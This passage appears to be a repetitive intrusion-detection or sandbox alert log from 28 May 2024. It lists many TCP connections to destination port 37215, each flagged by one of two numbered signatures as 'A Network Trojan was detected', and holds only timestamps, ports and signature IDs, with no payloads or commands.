          Timestamp:05/28/24-14:47:12.871245
          SID:2829579
          Source Port:47066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299673
          SID:2835222
          Source Port:52376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211823
          SID:2829579
          Source Port:57210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812885
          SID:2829579
          Source Port:48540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297741
          SID:2829579
          Source Port:46272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964408
          SID:2835222
          Source Port:59864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.626412
          SID:2835222
          Source Port:37536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530096
          SID:2829579
          Source Port:42758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462178
          SID:2829579
          Source Port:42540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843149
          SID:2829579
          Source Port:56766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267394
          SID:2835222
          Source Port:52278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405317
          SID:2835222
          Source Port:38112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551087
          SID:2835222
          Source Port:60422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066008
          SID:2835222
          Source Port:47260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946659
          SID:2835222
          Source Port:49176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153357
          SID:2829579
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665417
          SID:2829579
          Source Port:52008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726815
          SID:2829579
          Source Port:57976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977383
          SID:2829579
          Source Port:47760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.564063
          SID:2829579
          Source Port:59722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.067732
          SID:2835222
          Source Port:53064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.064648
          SID:2835222
          Source Port:36512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.319148
          SID:2835222
          Source Port:44356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732787
          SID:2829579
          Source Port:46776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793609
          SID:2829579
          Source Port:52462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651119
          SID:2829579
          Source Port:52990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590581
          SID:2835222
          Source Port:38588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815410
          SID:2829579
          Source Port:45576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214844
          SID:2835222
          Source Port:48552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.214818
          SID:2829579
          Source Port:53384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229039
          SID:2835222
          Source Port:35880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551708
          SID:2835222
          Source Port:38154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337832
          SID:2835222
          Source Port:39850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341982
          SID:2835222
          Source Port:34522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356976
          SID:2835222
          Source Port:51324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.871042
          SID:2829579
          Source Port:59440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.637148
          SID:2835222
          Source Port:46474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.292879
          SID:2829579
          Source Port:45884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771845
          SID:2829579
          Source Port:41614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923565
          SID:2829579
          Source Port:41506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.090936
          SID:2835222
          Source Port:45996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598657
          SID:2835222
          Source Port:46272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709012
          SID:2829579
          Source Port:60612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337400
          SID:2835222
          Source Port:34690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177517
          SID:2835222
          Source Port:44122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209362
          SID:2829579
          Source Port:56142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725135
          SID:2835222
          Source Port:34760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667826
          SID:2829579
          Source Port:33484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321142
          SID:2835222
          Source Port:41052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741813
          SID:2835222
          Source Port:44552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272431
          SID:2829579
          Source Port:48340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843258
          SID:2835222
          Source Port:45350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544128
          SID:2829579
          Source Port:56638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283639
          SID:2829579
          Source Port:51366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237221
          SID:2835222
          Source Port:36486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300115
          SID:2829579
          Source Port:39608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528263
          SID:2835222
          Source Port:58490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272341
          SID:2829579
          Source Port:39086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.723795
          SID:2829579
          Source Port:49658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062091
          SID:2835222
          Source Port:46154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.986223
          SID:2835222
          Source Port:35624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187375
          SID:2829579
          Source Port:55878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.609990
          SID:2835222
          Source Port:47600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804420
          SID:2835222
          Source Port:38734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.082533
          SID:2829579
          Source Port:35286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266703
          SID:2829579
          Source Port:54284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962849
          SID:2835222
          Source Port:45712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.302770
          SID:2835222
          Source Port:59778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103252
          SID:2829579
          Source Port:35484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.774269
          SID:2829579
          Source Port:53152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739789
          SID:2835222
          Source Port:44036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978344
          SID:2835222
          Source Port:40032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739929
          SID:2829579
          Source Port:40348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.081471
          SID:2835222
          Source Port:42712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204619
          SID:2835222
          Source Port:51878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272715
          SID:2835222
          Source Port:51120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224309
          SID:2829579
          Source Port:33598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511380
          SID:2835222
          Source Port:39260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868559
          SID:2829579
          Source Port:43166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932760
          SID:2835222
          Source Port:56506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473732
          SID:2829579
          Source Port:52326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922518
          SID:2829579
          Source Port:43448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324574
          SID:2829579
          Source Port:59848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466196
          SID:2835222
          Source Port:35820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.851560
          SID:2835222
          Source Port:49200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065400
          SID:2829579
          Source Port:50980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.348887
          SID:2829579
          Source Port:59200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730176
          SID:2835222
          Source Port:54482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045833
          SID:2835222
          Source Port:53430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271918
          SID:2829579
          Source Port:43492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403127
          SID:2829579
          Source Port:45446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332366
          SID:2829579
          Source Port:55314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403133
          SID:2829579
          Source Port:41648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462526
          SID:2835222
          Source Port:52484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.976071
          SID:2835222
          Source Port:49694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.366353
          SID:2835222
          Source Port:60126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975328
          SID:2835222
          Source Port:47110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325350
          SID:2835222
          Source Port:49658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858433
          SID:2829579
          Source Port:59240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.233126
          SID:2829579
          Source Port:45680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.499812
          SID:2835222
          Source Port:40342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941627
          SID:2835222
          Source Port:49032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298419
          SID:2829579
          Source Port:41170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.626463
          SID:2829579
          Source Port:45994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.982912
          SID:2829579
          Source Port:36704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.112880
          SID:2829579
          Source Port:49092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.675403
          SID:2829579
          Source Port:46220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462875
          SID:2829579
          Source Port:52474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350447
          SID:2835222
          Source Port:57808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943921
          SID:2829579
          Source Port:33056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529000
          SID:2835222
          Source Port:44306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797200
          SID:2835222
          Source Port:40790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772448
          SID:2829579
          Source Port:59760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.246155
          SID:2829579
          Source Port:44374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301271
          SID:2835222
          Source Port:44460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488320
          SID:2829579
          Source Port:60838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.301307
          SID:2829579
          Source Port:42052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.430359
          SID:2835222
          Source Port:50776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652915
          SID:2829579
          Source Port:39572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273320
          SID:2829579
          Source Port:33556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.280913
          SID:2835222
          Source Port:38868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271454
          SID:2835222
          Source Port:41414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466592
          SID:2829579
          Source Port:49286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.009951
          SID:2829579
          Source Port:42886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.056905
          SID:2829579
          Source Port:49062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590701
          SID:2829579
          Source Port:38828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462560
          SID:2829579
          Source Port:51216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209416
          SID:2835222
          Source Port:45352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147298
          SID:2835222
          Source Port:34484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562796
          SID:2829579
          Source Port:57814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946839
          SID:2835222
          Source Port:52204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770579
          SID:2835222
          Source Port:47784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890100
          SID:2829579
          Source Port:57516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267196
          SID:2829579
          Source Port:58734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116738
          SID:2835222
          Source Port:46780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039017
          SID:2829579
          Source Port:38798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878037
          SID:2835222
          Source Port:40712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272367
          SID:2835222
          Source Port:41668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877941
          SID:2835222
          Source Port:47990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.159641
          SID:2829579
          Source Port:41512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.091609
          SID:2829579
          Source Port:51514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710264
          SID:2829579
          Source Port:59716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207034
          SID:2829579
          Source Port:41156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.333329
          SID:2829579
          Source Port:53918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115536
          SID:2835222
          Source Port:35250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.280955
          SID:2835222
          Source Port:56990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860550
          SID:2835222
          Source Port:36560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.303038
          SID:2829579
          Source Port:46942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140260
          SID:2835222
          Source Port:51094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.687032
          SID:2829579
          Source Port:55834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711311
          SID:2829579
          Source Port:39338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.011085
          SID:2829579
          Source Port:60420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.603943
          SID:2829579
          Source Port:34896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727660
          SID:2835222
          Source Port:52096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.799742
          SID:2829579
          Source Port:41586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267583
          SID:2829579
          Source Port:60306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.286004
          SID:2829579
          Source Port:38148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.810441
          SID:2829579
          Source Port:60820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176429
          SID:2829579
          Source Port:57062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.526495
          SID:2829579
          Source Port:43384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530185
          SID:2835222
          Source Port:34284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651139
          SID:2829579
          Source Port:33972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890073
          SID:2835222
          Source Port:34436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213513
          SID:2835222
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273521
          SID:2835222
          Source Port:47042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.862035
          SID:2835222
          Source Port:47808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283686
          SID:2835222
          Source Port:43326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669528
          SID:2835222
          Source Port:41010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548559
          SID:2829579
          Source Port:50276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841346
          SID:2835222
          Source Port:35080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689500
          SID:2835222
          Source Port:50466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975199
          SID:2835222
          Source Port:44712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228458
          SID:2835222
          Source Port:56816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.219900
          SID:2829579
          Source Port:42668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891527
          SID:2829579
          Source Port:60416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864251
          SID:2835222
          Source Port:49610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935191
          SID:2835222
          Source Port:60156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183153
          SID:2829579
          Source Port:37332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685041
          SID:2829579
          Source Port:41444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209427
          SID:2835222
          Source Port:48932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713366
          SID:2829579
          Source Port:37776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.802757
          SID:2835222
          Source Port:34122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243236
          SID:2829579
          Source Port:59968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271477
          SID:2829579
          Source Port:51558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.928009
          SID:2829579
          Source Port:42826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464107
          SID:2829579
          Source Port:52716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657156
          SID:2835222
          Source Port:39206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141427
          SID:2829579
          Source Port:60770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230021
          SID:2835222
          Source Port:47222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336107
          SID:2829579
          Source Port:38954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240591
          SID:2829579
          Source Port:37168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961741
          SID:2835222
          Source Port:51382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272238
          SID:2829579
          Source Port:37790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.485745
          SID:2829579
          Source Port:60584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291536
          SID:2829579
          Source Port:34708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732051
          SID:2835222
          Source Port:41556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.945470
          SID:2829579
          Source Port:39990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062388
